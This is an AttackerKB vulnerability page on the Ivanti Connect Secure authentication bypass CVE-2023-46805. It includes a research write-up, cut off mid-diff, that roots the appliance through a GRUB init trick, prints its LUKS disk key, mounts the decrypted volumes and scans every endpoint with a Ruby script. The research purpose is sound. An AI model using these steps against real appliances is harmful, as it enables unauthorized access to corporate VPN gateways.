Very High
CVE-2023-46805
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
CVE-2023-46805
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.
Add Assessment
Ratings
-
Attacker ValueVery High
-
ExploitabilityMedium
Technical Analysis
CVE-2023-46805 is an authentication bypass vulnerability found in the web component of Ivanti Connect Secure (ICS), which was previously known as Pulse Connect Secure and Ivanti Policy Secure. This vulnerability affects all supported versions of Ivanti ICS and Policy Secure 9.x and 22.x.
Details of CVE-2023-46805:
- The vulnerability allows an attacker to bypass control checks and access restricted resources.
- It was exploited in the wild in a chained attack for unauthenticated remote code execution (RCE) as early as December 2023.
- According to Volexity, a cybersecurity firm, the zero-day exploitation of these flaws was attributed to UTA0178, believed to be a Chinese nation-state level threat actor.
- The attackers deployed webshells, including GLASSTOKEN, on both internet-facing and internal assets to maintain persistence on a network after compromise.
Mitigation and Updates:
- As of the latest information, Ivanti has not released a patch for this vulnerability. However, they provided a mitigation script that should be used immediately.
- Ivanti announced that patches for this vulnerability would be released in a staggered schedule, with the first version targeted to be available in the week of 22 January 2024 and the final version by the week of 19 February 2024.
- Users and administrators of affected product versions are advised to apply mitigation measures provided by Ivanti.
Impact and Detection:
- Attackers modified legitimate components of Ivanti Connect Secure, such as
compcheck.cgi
andlastauthserverused.js
, to support execution of remote commands and credential theft.
- Organizations can detect potential compromise through network traffic analysis, VPN device log analysis, and execution of the Integrity Checker Tool.
Recommendation:
- It is crucial for users and administrators to apply the current workarounds immediately and to update the systems once patches are released.
- Monitoring for signs of compromise is recommended, including examining network traffic and VPN device logs.
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- ivanti
Products
- connect secure 22.1,
- connect secure 22.2,
- connect secure 22.3,
- connect secure 22.4,
- connect secure 22.5,
- connect secure 22.6,
- connect secure 9.0,
- connect secure 9.1,
- policy secure 22.1,
- policy secure 22.2,
- policy secure 22.3,
- policy secure 22.4,
- policy secure 22.5,
- policy secure 22.6,
- policy secure 9.0,
- policy secure 9.1
Exploited in the Wild
Would you like to delete this Exploited in the Wild Report?
Yes, delete this report- Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- Other: CISA Gov Alert (https://www.cisa.gov/news-events/alerts/2024/01/10/cisa-adds-two-known-exploited-vulnerabilities-catalog)
Would you like to delete this Exploited in the Wild Report?
Yes, delete this reportWould you like to delete this Exploited in the Wild Report?
Yes, delete this reportReferences
Exploit
A PoC added here by the AKB Worker must have at least 2 GitHub stars.
Miscellaneous
Additional Info
Technical Analysis
Overview
Starting January 10, 2024, multiple parties (Ivanti, Volexity, and Mandiant) disclosed the existence of a zero-day exploit chain affecting Ivanti Connect Secure (previously called Pulse Connect Secure) and Ivanti Policy Secure gateway. This exploit chain was exploited in the wild circa December 2023. The exploit chain consists of two vulnerabilities, an authentication bypass (CVE-2023-46805) and a command injection vulnerability (CVE-2024-21887). The exploit chain allows a remote unauthenticated attacker to execute arbitrary OS commands with root privileges. As per the Ivanti advisory, these vulnerabilities affect all supported versions of the products, versions 9.x and 22.x. It is unknown if the unsupported versions 8.x and older are also affected.
This analysis will detail our findings against Ivanti Connect Secure version 22.3R1 (build 1647).
Jailbreaking the Appliance
The version of Ivanti Connect Secure we tested is distributed as a virtual appliance that can run on either VMWare or HyperV. After installing the appliance via HyperV and letting it run for a while we took a snapshot of the VM and saved the virtual hard disk to a VHD file. We then mounted this VHD in a separate Ubuntu Linux VM so we could begin to inspect the contents. We quickly learn that the majority of partitions are LUKS encrypted, and we cannot access them without a key or a jailbreak, i.e. getting a root shell on the device somehow.
Prior work by Orange Tsai and Meh Chang in 2019 against Pulse Connect Secure (Infiltrating Corporate Intranet Like NSA (PDF)) showed how to jailbreak the appliance by patching an initialization script’s path in-memory, during a specific point in the boot process. This allowed a root shell to be spawned and gave full access to the mounted filesystem. Unfortunately this technique no longer works.
On January 13, 2024, watchTowr Labs published a blog that demonstrated how they managed to jailbreak the appliance by dropping to a Grub bootloader recovery shell using a novel technique that bypasses an attempt at blocking the default recovery shell. Using this technique, we were able to recover the encryption key for the appliance.
First we boot the appliance and from Grub, we press e
to edit the current configuration. We use the watchTowr technique and append the parameter init=//bin/sh
to bypass the recovery shell filtering (/bin/sh
is blocked, but an alternative path such as //bin/sh
will work).
We then press F10 to boot, and are dropped to a shell. We dump the contents of the 16 byte encryption key via the command cat -Ev /etc/lvmkey
. The -v
switch will output the files contents using an obscure notation that uses ^
and M-
sequences to encode non-ASCII characters (A decoding table can be found here). We do this as we found no other way to exfiltrate the 16 byte key from the recovery shell. We also use the switch -E
to display the $ symbol for the new line char, as coincidentally the key contains this character.
Using this notation, we learn that the key is $M-9M-^^M-OM-^IuNM-G
`^XM-J^NM-Z]jM-G
, and when converted into hex notation this becomes 0ab99ecf89754ec76018ca0eda5d6ac7
.
Knowing the decryption key we can now successfully mount the encrypted volumes via the following sequence of commands:
# Install required tools... $ sudo apt install lvm2 $ sudo apt install cryptsetup-bin # Detect the volumes... $ sudo vgscan Found volume group "groupA" using metadata type lvm2 Found volume group "groupZ" using metadata type lvm2 $ sudo vgchange -ay groupA 2 logical volume(s) in volume group "groupA" now active $ sudo vgchange -ay groupZ 1 logical volume(s) in volume group "groupZ" now active $ sudo lvs LV VG Attr LSize Pool Origin Data% Meta% Move Log Cpy%Sync Convert home groupA -wi-a----- 3.50g runtime groupA -wi-a----- 8.80g home groupZ -wi-a----- 3.00g # Write the LUKS decryption key to a file... $ echo -n 0ab99ecf89754ec76018ca0eda5d6ac7 | xxd -r -p - > key.bin # Open the 3 volumes... $ sudo cryptsetup luksOpen -d key.bin /dev/groupA/home ics_disk1 $ sudo cryptsetup luksOpen -d key.bin /dev/groupA/runtime ics_disk2 $ sudo cryptsetup luksOpen -d key.bin /dev/groupZ/home ics_disk3 # Mount the 3 volumes... $ mkdir ics_disk1 ics_disk2 ics_disk3 $ sudo mount /dev/mapper/ics_disk1 ics_disk1/ $ sudo mount /dev/mapper/ics_disk2 ics_disk2/ $ sudo mount /dev/mapper/ics_disk3 ics_disk3/ # Verify we can access the appliance files… $ cat ics_disk1/root/home/ssl-vpn-VERSION export DSREL_MAJOR=22 export DSREL_MINOR=3 export DSREL_MAINT=1 export DSREL_DATAVER=4802 export DSREL_PRODUCT=ssl-vpn export DSREL_DEPS=ive export DSREL_BUILDNUM=1647 export DSREL_COMMENT="R1"
Of the three encrypted volumes, the first volume which we mounted as ics_disk1
contains the application code used throughout the below analysis.
Bypassing Authentication
There is not a lot of information to go on when trying to identify the vulnerabilities in this exploit chain. We have two pieces of information, an XML file from the vendor which can apply a “mitigation” to a vulnerable system, and the description of the auth bypass according to the vendor:
An authentication bypass vulnerability in the web component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.
The CVE mentions the web component is affected, and that control checks can be bypassed, so we begin by investigating how the appliance’s web component operates and in particular, how it enforces access controls.
We identified a custom web server written in C++ and located in the binary ics_disk1/root/home/bin/web
. This server will handle all incoming HTTPS requests for numerous resources, including Perl based CGI scripts and a Python based REST API. The REST API is implemented as a separate Python Flask application, and listens on a locally bound TCP port 8090. The REST API endpoints are implemented via the code located in ics_disk1/root/home/venv3/lib/python3.6/site-packages/restservice-0.1-py3.6.egg
. The native code web server will proxy requests to this REST server as needed and authentication is enforced in the native web server and not the Flask application.
We begin by pulling all URI endpoints that have been hard coded into both the native code web server binary and the Python based REST server source code. A simple Ruby script is then used to request all endpoints and record their HTTP response code.
require 'httparty' require 'json' # pulled from restservice-0.1-py3.6/restservice/api/__init__.py and /root/home/bin/web endpoints = [ "/_/api/aaa", "/api/", "/api/my-session", "/api/private/v1/classic-admin-ui", "/api/private/v1/cluster/password", "/api/private/v1/controller-changeset", "/api/private/v1/license/watermarks/<path:url_suffix>", "/api/private/v1/totp/server-status", "/api/private/v1/totp/user-backup-code", "/api/private/v1/totp/user-login", "/api/v1/", "/api/v1/auth", "/api/v1/cav", "/api/v1/cav/", "/api/v1/cav/client/", "/api/v1/cav/client/auth_token", "/api/v1/cluster", "/api/v1/cluster/", "/api/v1/cluster/<path:section>", "/api/v1/configuration", "/api/v1/configuration/", "/api/v1/configuration/<path:configuration_path>", "/api/v1/configuration/auth/ace-server/log-table", "/api/v1/dsintegration", "/api/v1/enduser", "/api/v1/enduser/autolaunch-client-apps", "/api/v1/enduser/bkm-panel-pref", "/api/v1/enduser/cached-passwords", "/api/v1/enduser/client/applaunchtoken", "/api/v1/enduser/client/applaunchtoken/status", "/api/v1/enduser/client/installer", "/api/v1/enduser/custom-html5-bookmark", "/api/v1/enduser/custom-html5-bookmark/input-text", "/api/v1/enduser/custom-ts-bookmark", "/api/v1/enduser/custom-ts-bookmark/input-text", "/api/v1/enduser/custom-unix-file-bookmark", "/api/v1/enduser/custom-web-bookmark", "/api/v1/enduser/custom-web-bookmark/input-text", "/api/v1/enduser/custom-windows-file-bookmark", "/api/v1/enduser/delete-user-admin", "/api/v1/enduser/display-mode", "/api/v1/enduser/display-unix-dir", "/api/v1/enduser/display-windows-dir", "/api/v1/enduser/fb/unix-file-download", "/api/v1/enduser/fb/unix-zip-download", "/api/v1/enduser/fb/win-file-download", "/api/v1/enduser/fb/win-zip-download", "/api/v1/enduser/full", "/api/v1/enduser/heartbeat", "/api/v1/enduser/host-resolve-status", "/api/v1/enduser/html5-remote-desktop-launcher", "/api/v1/enduser/jsam/apps-reorder", "/api/v1/enduser/jsam/custom-client-apps", "/api/v1/enduser/jsam/list-client-apps", "/api/v1/enduser/jsam/restore-system-settings", "/api/v1/enduser/landing-page", "/api/v1/enduser/landing-page/browse", "/api/v1/enduser/logo-img", "/api/v1/enduser/onboarding/profile-secure", "/api/v1/enduser/panel_order", "/api/v1/enduser/password", "/api/v1/enduser/rdp-launcher", "/api/v1/enduser/server-cookies", "/api/v1/enduser/totp-backup-codes", "/api/v1/enterprise-onboard/csr-template-status", "/api/v1/enterprise-onboard/scep-configuration", "/api/v1/esapdata", "/api/v1/fb/create-folder", "/api/v1/fb/create-folder-unix", "/api/v1/fb/list", "/api/v1/fb/list-unix", "/api/v1/fb/set-credentials", "/api/v1/fb/unix/upload", "/api/v1/fb/windows/upload", "/api/v1/gateways", "/api/v1/host-checker/live-update/validate-credentials", "/api/v1/integration/", "/api/v1/license/auth-code", "/api/v1/license/enforcement", "/api/v1/license/enforcement/", "/api/v1/license/ice", "/api/v1/license/ice/", "/api/v1/license/keys-status", "/api/v1/license/keys-status/<path:node_name>", "/api/v1/license/leased-license-info", "/api/v1/license/leased-license-info/", "/api/v1/license/license-agreement-text", "/api/v1/license/license-capacity", "/api/v1/license/license-capacity/", "/api/v1/license/license-client-lease-state", "/api/v1/license/license-clients", "/api/v1/license/license-key", "/api/v1/license/license-server-last-contact-time", "/api/v1/license/license-server-lease-information", "/api/v1/license/max-licensed-concurrent-users", "/api/v1/license/named-users", "/api/v1/license/named-users/pcs", "/api/v1/license/named-users/pps", "/api/v1/license/nsalicense/delete-named-user", "/api/v1/license/pcls/last-contact-time", "/api/v1/license/report", "/api/v1/license/report/", "/api/v1/license/report/<path:url_suffix>", "/api/v1/logs", "/api/v1/logs/<path:section>", "/api/v1/metrics", "/api/v1/network", "/api/v1/network/<path:section>", "/api/v1/nsa/register", "/api/v1/nsa/registration-status", "/api/v1/oidc", "/api/v1/pps/action/", "/api/v1/profiler/", "/api/v1/profiler/auth", "/api/v1/profiler/exchange", "/api/v1/profiler/filter", "/api/v1/profiler/ws", "/api/v1/pulse-client", "/api/v1/pulse-client/component-settings/<path:url_suffix>", "/api/v1/pulse-one", "/api/v1/pulse-one/<path:section>", "/api/v1/realm_auth", "/api/v1/saml-", "/api/v1/saml-config/<path:auth_server_name>/download-metadata", "/api/v1/saml-config/<path:metadata_provider_name>", "/api/v1/saml-config/idp", "/api/v1/saml-config/idp/download-signin-metadata", "/api/v1/saml-config/sp", "/api/v1/sdpotp", "/api/v1/snmp/download-mib", "/api/v1/snmpv3", "/api/v1/snmpv3/<path:section>", "/api/v1/stats", "/api/v1/stats/", "/api/v1/stats/<path:url_suffix>", "/api/v1/system/active-users", "/api/v1/system/active-users/session/<path:url_suffix>", "/api/v1/system/ai-configs/<path:section>", "/api/v1/system/auth-server/mdm", "/api/v1/system/auth-server/totp", "/api/v1/system/auth/aaa-ports-list", "/api/v1/system/auth/auth-server/<path:auth_server>/api-key", "/api/v1/system/auth/auth-server/<path:auth_server>/groups", "/api/v1/system/auth/auth-server/<path:auth_server_name>", "/api/v1/system/auth/auth-server/<path:auth_server_name>/troubleshoot", "/api/v1/system/auth/auth-server/<path:auth_server_name>/users", "/api/v1/system/auth/auth-server/api-key-without-saving", "/api/v1/system/auth/auth-server/ldap-test-connection", "/api/v1/system/auth/auth-server/simulate-variables", "/api/v1/system/binary-configuration", "/api/v1/system/certificates/client-auth-certificate", "/api/v1/system/certificates/client-auth-certificate-csrs", "/api/v1/system/certificates/client-auth-certificate-csrs/", "/api/v1/system/certificates/client-auth-certificate-csrs/<path:url_suffix>", "/api/v1/system/certificates/client-ca", "/api/v1/system/certificates/code-signing-certificates", "/api/v1/system/certificates/crl", "/api/v1/system/certificates/device-certificate", "/api/v1/system/certificates/device-certificate-csrs", "/api/v1/system/certificates/device-certificate-csrs/", "/api/v1/system/certificates/device-certificate-csrs/<path:url_suffix>", "/api/v1/system/certificates/device-certificates", "/api/v1/system/certificates/device-certificates/<path:url_suffix>", "/api/v1/system/certificates/expiring-certificates", "/api/v1/system/certificates/global-onboarding-certificate", "/api/v1/system/certificates/intermediate-ca", "/api/v1/system/certificates/server-ca", "/api/v1/system/certificates/smime-certificate", "/api/v1/system/date-time", "/api/v1/system/delete-records", "/api/v1/system/failed-login-count", "/api/v1/system/healthcheck", "/api/v1/system/ifmap/imported-sessions", "/api/v1/system/ifmap/imported-sessions/<path:url_suffix>", "/api/v1/system/maintenance", "/api/v1/system/maintenance/archiving/cloud-server-test-connection", "/api/v1/system/maintenance/archiving/localbackup", "/api/v1/system/maintenance/export-universal-xml", "/api/v1/system/maintenance/export-xml", "/api/v1/system/maintenance/import-xml", "/api/v1/system/maintenance/options", "/api/v1/system/maintenance/password-protection", "/api/v1/system/maintenance/upgrade", "/api/v1/system/platform", "/api/v1/system/resource-profiles/web-profile/<path:applet_name>", "/api/v1/system/saml/metadata-server-configuration", "/api/v1/system/status/<path:section>", "/api/v1/system/status/active-sync-devices", "/api/v1/system/status/active-sync-devices/<path:active_sync_session_id>", "/api/v1/system/status/active-sync-devices/<path:active_sync_session_id>/allow-access", "/api/v1/system/status/active-sync-devices/<path:active_sync_session_id>/block-access", "/api/v1/system/status/ntp", "/api/v1/system/status/overview", "/api/v1/system/system-information", "/api/v1/system/user-record-synchronization", "/api/v1/system/user-record-synchronization/database/delete", "/api/v1/system/user-record-synchronization/database/export", "/api/v1/system/user-record-synchronization/database/import", "/api/v1/system/user-record-synchronization/database/retrieve-stats", "/api/v1/system/user-roles/<role_name>", "/api/v1/system/user-roles/vlansourceip", "/api/v1/system/user-stats", "/api/v1/tasks", "/api/v1/tenant/status", "/api/v1/totp/<totpSrv>/users", "/api/v1/totp/<totpSrv>/users/", "/api/v1/totp/<totpSrv>/users/<user>", "/api/v1/totp/<totpSrv>/users/<user>/", "/api/v1/totp/user-backup-code", "/api/v1/ueba/", "/api/v1/users/resource-profile/<path:profile_name>", "/api/v1/users/resource-profile/virtual-desktops-list", "/dana", "/dana-", "/dana-admin/", "/dana-admin/download/", "/dana-admin/mail/", "/dana-admin/snmp/", "/dana-cached/", "/dana-cached/cbox/", "/dana-cached/cc/", "/dana-cached/css/", "/dana-cached/ep/", "/dana-cached/fb/", "/dana-cached/fb/nfs/nfv.cgi", "/dana-cached/fb/smb/wfv.cgi", "/dana-cached/hc/", "/dana-cached/imgs/", "/dana-cached/js/shimdata.cgi", "/dana-cached/psal/", "/dana-cached/remediation/", "/dana-cached/sc/", "/dana-cached/sc/PulseInstallerServiceVersion.txt", "/dana-cached/setup/", "/dana-cached/term/", "/dana-cached/themes/", "/dana-cached/webapplets", "/dana-cached/ws/", "/dana-html5acc", "/dana-html5bssl", "/dana-na", "/dana-na/", "/dana-na/auth", "/dana-na/auth/", "/dana-na/auth/AAAAAAAA/welcome.cgi", "/dana-na/auth/AAAAAAAA/welcome.cgi?p=no-access", "/dana-na/auth/AAAAAAAA/welcome.cgi?p=ssl-weak", "/dana-na/auth/AAAAAAAA/welcome.cgi?p=timed-out", "/dana-na/auth/AAAAAAAAAAAAAAAA/welcome.cgi", "/dana-na/auth/logout.cgi", "/dana-na/auth/recover.cgi", "/dana-na/auth/restAuth.cgi", "/dana-na/auth/saml-sso.cgi", "/dana-na/auth/welcome.", "/dana-na/auth/welcome.cgi?p=denied-checkhostname", "/dana-na/auth/welcome.cgi?p=forced-off", "/dana-na/auth/welcome.cgi?p=ssl-renego", "/dana-na/auth/welcome.cgi?p=timed-out", "/dana-na/auth/welcome.cgi?p=user-unknown", "/dana-na/css/", "/dana-na/healthcheck/healthcheck.cgi", "/dana-na/html/blank.html", "/dana-na/imgs/", "/dana-na/meeting/", "/dana-na/meeting/AAAAAAAAAAAAAAAA/login_meeting.cgi", "/dana-na/meeting/login_meeting.cgi", "/dana-na/nc/nc_gina_ver.txt", "/dana-na/neoteriswatchdogprocess/ping", "/dana-na/setup/psalinstall.cgi", "/dana-na/ws/", "/dana-ws/metric/", "/dana-ws/namedusers/", "/dana-ws/namedusers/PCS", "/dana-ws/namedusers/PPS", "/dana-ws/saml.ws", "/dana-ws/saml20.ws", "/dana-ws/samlecp.ws", "/dana-ws/soap/", "/dana-ws/soap/dsifmap", "/dana/", "/dana/asm/asmrun.cgi?ppc_wsam_not_installed", "/dana/cs/cs.cgi", "/dana/cs/cs_add.cgi", "/dana/cs/csdbg.cgi", "/dana/cs/jsammessages", "/dana/download", "/dana/download/", "/dana/error/AccessBlocked.msg", "/dana/error/BadCgiOutput.msg", "/dana/error/BadContent.msg", "/dana/error/CannotConnect.msg", "/dana/error/CannotReadFromOrigServer.msg", "/dana/error/CgiDied.msg", "/dana/error/CgiFailed.msg", "/dana/error/CgiNotExecutable.msg", "/dana/error/ExcessiveRequestSize.msg", "/dana/error/FormPostAutoRedirect.msg", "/dana/error/FormPostBlocked.msg", "/dana/error/InternalError.msg", "/dana/error/InvalidContentLength.msg", "/dana/error/InvalidHostHeader.msg", "/dana/error/InvalidOnBoardingURL.msg", "/dana/error/InvalidPath.msg", "/dana/error/InvalidPathDisallowedChars.msg", "/dana/error/InvalidSSLSiteConfirm.msg", "/dana/error/InvalidSSLSiteDisabled.msg", "/dana/error/MethodDisallowed.msg", "/dana/error/NTLMFail.msg", "/dana/error/NewSSLConnFail.msg", "/dana/error/OutOfDescriptors.msg", "/dana/error/PageNotFound.msg", "/dana/error/PlatformNotSupported.msg", "/dana/error/ResolveHostnameFail.msg", "/dana/error/RewritingBlocked.msg", "/dana/error/TooManyOnboardRequest.msg", "/dana/error/UserLoginYellowBarMessage.msg", "/dana/error/WebProxyProcessFail.msg", "/dana/error/WebSSOFailed.msg", "/dana/error/finishReadingPostBody.msg", "/dana/fb/", "/dana/fb/nfs/addnsh.cgi", "/dana/fb/nfs/nfb.cgi", "/dana/fb/nfs/nfmd.cgi", "/dana/fb/nfs/nnf.cgi", "/dana/fb/nfs/nu.cgi", "/dana/fb/nfs/snsrv.cgi", "/dana/fb/smb", "/dana/fb/smb/addwsh.cgi", "/dana/fb/smb/rd.cgi", "/dana/fb/smb/swg.cgi", "/dana/fb/smb/wfb.cgi", "/dana/fb/smb/wfmd.cgi", "/dana/fb/smb/wnf.cgi", "/dana/fb/smb/wu.cgi", "/dana/home", "/dana/home/activexparams.cgi", "/dana/home/applaunchtoken.cgi", "/dana/home/editbk.cgi", "/dana/home/getProfileSecure.cgi", "/dana/home/homepage.cgi", "/dana/home/index.cgi", "/dana/home/index_data.cgi", "/dana/home/infranet.cgi", "/dana/home/infranet_data.cgi", "/dana/home/installfailed.cgi", "/dana/home/launch.cgi", "/dana/home/launch.cgi?", "/dana/home/netehpl.cgi", "/dana/home/netestarter.cgi?url=", "/dana/home/norefr.cgi", "/dana/home/onboarding.cgi", "/dana/home/onboarding_device.cgi", "/dana/home/panelpref.cgi", "/dana/home/psalwait.cgi", "/dana/home/starter.cgi", "/dana/home/starter.cgi?startpageonly=1", "/dana/home/starter0", "/dana/html5acc/guacamole/", "/dana/j", "/dana/jr?", "/dana/js", "/dana/js?", "/dana/jw?", "/dana/jz?", "/dana/pref/advpref.cgi", "/dana/pref/applications.cgi", "/dana/pref/pref.cgi", "/dana/pref/useradm.cgi", "/dana/pref/userhome.cgi", "/dana/psalbrowser-extension/", "/dana/term", "/dana/term/addhtml5acc.cgi", "/dana/term/winaddterm.cgi", "/dana/term/winlaunchterm.cgi", "/dana/uploadlog/uploadlog.cgi", "/dana/user/", ] target = 'https://192.168.86.111' HTTParty::Basement.default_options.update(verify: false) endpoints.each do |endpoint| endpoint.gsub!(/(<\S+>)/, 'A' * 32 ) begin response = HTTParty.get("#{target}#{endpoint}",follow_redirects: false) p "GET, #{response.code}, #{endpoint}" rescue p "GET, timeout, #{endpoint}" end begin response = HTTParty.post("#{target}#{endpoint}",follow_redirects: false) p "POST, #{response.code}, #{endpoint}" rescue p "POST, timeout, #{endpoint}" end begin response = HTTParty.put("#{target}#{endpoint}",follow_redirects: false) p "PUT, #{response.code}, #{endpoint}" rescue p "PUT, timeout, #{endpoint}" end begin response = HTTParty.delete("#{target}#{endpoint}",follow_redirects: false) p "DELETE, #{response.code}, #{endpoint}" rescue p "DELETE, timeout, #{endpoint}" end end
We run this script twice, first against an instance of Ivanti Connect Secure that does not have the mitigation file applied, and a second time against an instance of Ivanti Connect Secure that does have the mitigation file applied. Comparing the results of these two files shows the following:
diff --git a/all_endpoints_no_mitigation.txt b/all_endpoints_yes_mitigation.txt index 0411078..c7c8111 100644 --- a/all_endpoints_no_mitigation.txt +++ b/all_endpoints_yes_mitigation.txt @@ -22,10 +22,10 @@ "POST, 403, /api/private/v1/controller-changeset" "PUT, 403, /api/private/v1/controller-changeset" "DELETE, 403, /api/private/v1/controller-changeset" -"GET, 302, /api/private/v1/license/watermarks/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -"POST, 302, /api/private/v1/license/watermarks/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -"PUT, 302, /api/private/v1/license/watermarks/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -"DELETE, 302, /api/private/v1/license/watermarks/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +"GET, 403, /api/private/v1/license/watermarks/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +"POST, 403, /api/private/v1/license/watermarks/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +"PUT, 403, /api/private/v1/license/watermarks/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +"DELETE, 403, /api/private/v1/license/watermarks/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "GET, 403, /api/private/v1/totp/server-status" "POST, 403, /api/private/v1/totp/server-status" "PUT, 403, /api/private/v1/totp/server-status" @@ -38,30 +38,30 @@ "POST, 403, /api/private/v1/totp/user-login" "PUT, 403, /api/private/v1/totp/user-login" "DELETE, 403, /api/private/v1/totp/user-login" -"GET, 302, /api/v1/" -"POST, 302, /api/v1/" -"PUT, 302, /api/v1/" -"DELETE, 302, /api/v1/" +"GET, 403, /api/v1/" +"POST, 403, /api/v1/" +"PUT, 403, /api/v1/" +"DELETE, 403, /api/v1/" "GET, 403, /api/v1/auth" "POST, 403, /api/v1/auth" "PUT, 403, /api/v1/auth" "DELETE, 403, /api/v1/auth" -"GET, 302, /api/v1/cav" -"POST, 302, /api/v1/cav" -"PUT, 302, /api/v1/cav" -"DELETE, 302, /api/v1/cav" -"GET, 302, /api/v1/cav/" -"POST, 302, /api/v1/cav/" -"PUT, 302, /api/v1/cav/" -"DELETE, 302, /api/v1/cav/" -"GET, 404, /api/v1/cav/client/" -"POST, 404, /api/v1/cav/client/" -"PUT, 404, /api/v1/cav/client/" -"DELETE, 404, /api/v1/cav/client/" -"GET, 302, /api/v1/cav/client/auth_token" -"POST, 302, /api/v1/cav/client/auth_token" -"PUT, 302, /api/v1/cav/client/auth_token" -"DELETE, 302, /api/v1/cav/client/auth_token" +"GET, 403, /api/v1/cav" +"POST, 403, /api/v1/cav" +"PUT, 403, /api/v1/cav" +"DELETE, 403, /api/v1/cav" +"GET, 403, /api/v1/cav/" +"POST, 403, /api/v1/cav/" +"PUT, 403, /api/v1/cav/" +"DELETE, 403, /api/v1/cav/" +"GET, 403, /api/v1/cav/client/" +"POST, 403, /api/v1/cav/client/" +"PUT, 403, /api/v1/cav/client/" +"DELETE, 403, /api/v1/cav/client/" +"GET, 403, /api/v1/cav/client/auth_token" +"POST, 403, /api/v1/cav/client/auth_token" +"PUT, 403, /api/v1/cav/client/auth_token" +"DELETE, 403, /api/v1/cav/client/auth_token" "GET, 403, /api/v1/cluster" "POST, 403, /api/v1/cluster" "PUT, 403, /api/v1/cluster" @@ -94,10 +94,10 @@ "POST, 403, /api/v1/dsintegration" "PUT, 403, /api/v1/dsintegration" "DELETE, 403, /api/v1/dsintegration" -"GET, 302, /api/v1/enduser" -"POST, 302, /api/v1/enduser" -"PUT, 302, /api/v1/enduser" -"DELETE, 302, /api/v1/enduser" +"GET, 403, /api/v1/enduser" +"POST, 403, /api/v1/enduser" +"PUT, 403, /api/v1/enduser" +"DELETE, 403, /api/v1/enduser" "GET, 302, /api/v1/enduser/autolaunch-client-apps" "POST, 302, /api/v1/enduser/autolaunch-client-apps" "PUT, 302, /api/v1/enduser/autolaunch-client-apps" @@ -186,22 +186,22 @@ "POST, 302, /api/v1/enduser/fb/win-zip-download" "PUT, 302, /api/v1/enduser/fb/win-zip-download" "DELETE, 302, /api/v1/enduser/fb/win-zip-download" -"GET, 302, /api/v1/enduser/full" -"POST, 302, /api/v1/enduser/full" -"PUT, 302, /api/v1/enduser/full" -"DELETE, 302, /api/v1/enduser/full" +"GET, 403, /api/v1/enduser/full" +"POST, 403, /api/v1/enduser/full" +"PUT, 403, /api/v1/enduser/full" +"DELETE, 403, /api/v1/enduser/full" "GET, 302, /api/v1/enduser/heartbeat" "POST, 302, /api/v1/enduser/heartbeat" "PUT, 302, /api/v1/enduser/heartbeat" "DELETE, 302, /api/v1/enduser/heartbeat" -"GET, 302, /api/v1/enduser/host-resolve-status" -"POST, 302, /api/v1/enduser/host-resolve-status" -"PUT, 302, /api/v1/enduser/host-resolve-status" -"DELETE, 302, /api/v1/enduser/host-resolve-status" -"GET, 302, /api/v1/enduser/html5-remote-desktop-launcher" -"POST, 302, /api/v1/enduser/html5-remote-desktop-launcher" -"PUT, 302, /api/v1/enduser/html5-remote-desktop-launcher" -"DELETE, 302, /api/v1/enduser/html5-remote-desktop-launcher" +"GET, 403, /api/v1/enduser/host-resolve-status" +"POST, 403, /api/v1/enduser/host-resolve-status" +"PUT, 403, /api/v1/enduser/host-resolve-status" +"DELETE, 403, /api/v1/enduser/host-resolve-status" +"GET, 403, /api/v1/enduser/html5-remote-desktop-launcher" +"POST, 403, /api/v1/enduser/html5-remote-desktop-launcher" +"PUT, 403, /api/v1/enduser/html5-remote-desktop-launcher" +"DELETE, 403, /api/v1/enduser/html5-remote-desktop-launcher" "GET, 302, /api/v1/enduser/jsam/apps-reorder" "POST, 302, /api/v1/enduser/jsam/apps-reorder" "PUT, 302, /api/v1/enduser/jsam/apps-reorder" @@ -418,10 +418,10 @@ "POST, 403, /api/v1/logs/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "PUT, 403, /api/v1/logs/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "DELETE, 403, /api/v1/logs/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -"GET, 302, /api/v1/metrics" -"POST, 302, /api/v1/metrics" -"PUT, 302, /api/v1/metrics" -"DELETE, 302, /api/v1/metrics" +"GET, 403, /api/v1/metrics" +"POST, 403, /api/v1/metrics" +"PUT, 403, /api/v1/metrics" +"DELETE, 403, /api/v1/metrics" "GET, 403, /api/v1/network" "POST, 403, /api/v1/network" "PUT, 403, /api/v1/network" @@ -486,10 +486,10 @@ "POST, 403, /api/v1/realm_auth" "PUT, 403, /api/v1/realm_auth" "DELETE, 403, /api/v1/realm_auth" -"GET, 302, /api/v1/saml-" -"POST, 302, /api/v1/saml-" -"PUT, 302, /api/v1/saml-" -"DELETE, 302, /api/v1/saml-" +"GET, 403, /api/v1/saml-" +"POST, 403, /api/v1/saml-" +"PUT, 403, /api/v1/saml-" +"DELETE, 403, /api/v1/saml-" "GET, 403, /api/v1/saml-config/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/download-metadata" "POST, 403, /api/v1/saml-config/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/download-metadata" "PUT, 403, /api/v1/saml-config/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/download-metadata" @@ -510,10 +510,10 @@ "POST, 403, /api/v1/saml-config/sp" "PUT, 403, /api/v1/saml-config/sp" "DELETE, 403, /api/v1/saml-config/sp" -"GET, 302, 